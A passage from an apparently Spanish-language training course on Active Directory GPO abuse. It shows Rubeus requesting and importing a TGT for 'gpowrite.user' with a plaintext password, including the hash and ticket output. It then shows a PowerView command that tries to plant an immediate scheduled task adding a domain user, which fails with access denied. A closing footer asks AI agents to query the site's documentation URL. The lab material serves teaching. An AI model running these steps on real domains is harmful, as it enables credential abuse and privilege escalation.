# Solicitando TGT para el usuario gpowrite.user

Este ejercicio se debe realizar con el usuario gpowrite.user

Primero podemos ejecutar el comando klist:

```powershell
C:\Users\admin\Desktop>klist

Current LogonId is 0:0x10d6046
Cached Tickets: (2)

#0>     Client: regular.user @ SPARTANCYBERSEC.CORP
        Server: krbtgt/SPARTANCYBERSEC.CORP @ SPARTANCYBERSEC.CORP
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 11/12/2023 20:30:04 (local)
        End Time:   11/13/2023 6:30:04 (local)
        Renew Time: 11/19/2023 20:30:04 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called: First-DC.spartancybersec.corp

#1>     Client: regular.user @ SPARTANCYBERSEC.CORP
        Server: ldap/First-DC.spartancybersec.corp/spartancybersec.corp @ SPARTANCYBERSEC.CORP
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
        Start Time: 11/12/2023 20:30:04 (local)
        End Time:   11/13/2023 6:30:04 (local)
        Renew Time: 11/19/2023 20:30:04 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: First-DC.spartancybersec.corp
```

Para este ejercicio es NECESARIO tener una sesion con el usuario gpowrite.user debido a: [Utilizando PowerView](/cpad/vulnerabilidades-y-ataques-en-ad/abuso-de-gpo/utilizando-powerview.md#analisis-tecnico-de-la-ace)

```
C:\Users\admin\Desktop>Rubeus.exe asktgt /user:gpowrite.user /password:Password@1 /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.3

[*] Action: Ask TGT

[*] Using rc4_hmac hash: 64FBAE31CC352FC26AF97CBDEF151E03
[*] Building AS-REQ (w/ preauth) for: 'spartancybersec.corp\gpowrite.user'
[*] Using domain controller: 10.0.1.100:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      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
[+] Ticket successfully imported!

  ServiceName              :  krbtgt/spartancybersec.corp
  ServiceRealm             :  SPARTANCYBERSEC.CORP
  UserName                 :  gpowrite.user (NT_PRINCIPAL)
  UserRealm                :  SPARTANCYBERSEC.CORP
  StartTime                :  11/12/2023 8:38:53 PM
  EndTime                  :  11/13/2023 6:38:53 AM
  RenewTill                :  11/19/2023 8:38:53 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  ckGFkkPnXw0mmfXrO9bdDQ==
  ASREP (key)              :  64FBAE31CC352FC26AF97CBDEF151E03
```

Despues de lo anterior, tendremos una sesion que puede ser validada con klist:

```
C:\Users\admin\Desktop>klist

Current LogonId is 0:0x10d6046
Cached Tickets: (1)

#0>     Client: gpowrite.user @ SPARTANCYBERSEC.CORP
        Server: krbtgt/spartancybersec.corp @ SPARTANCYBERSEC.CORP
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 11/12/2023 20:38:53 (local)
        End Time:   11/13/2023 6:38:53 (local)
        Renew Time: 11/19/2023 20:38:53 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:
```

Si ejecutamos los siguientes pasos, se obtendra un error:

```powershell
PS C:\Users\regular.user> New-GPOImmediateTask -Verbose -Force -TaskName 'EvilScript2023' -GPODisplayName 'Default Domain Controllers Policy' -Command cmd -CommandArguments "/c net user abuso.gpo P4ssw0rd /add"
VERBOSE: Get-DomainSearcher search string: LDAP://DC=spartancybersec,DC=corp
VERBOSE: Trying to weaponize GPO: {6AC1786C-016F-11D2-945F-00C04fB984F9}
Set-Content : Network access is denied.
At line:6104 char:28
+ ...  $TaskXML | Set-Content -Encoding ASCII -Path "$TaskPath\ScheduledTas ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : WriteError: (\\spartancybers...eduledTasks.xml:String) [Set-Content], IOException
    + FullyQualifiedErrorId : GetContentWriterIOError,Microsoft.PowerShell.Commands.SetContentCommand
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://books.spartan-cybersec.com/cpad/vulnerabilidades-y-ataques-en-ad/abuso-de-gpo/solicitando-tgt-para-el-usuario-gpowrite.user.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.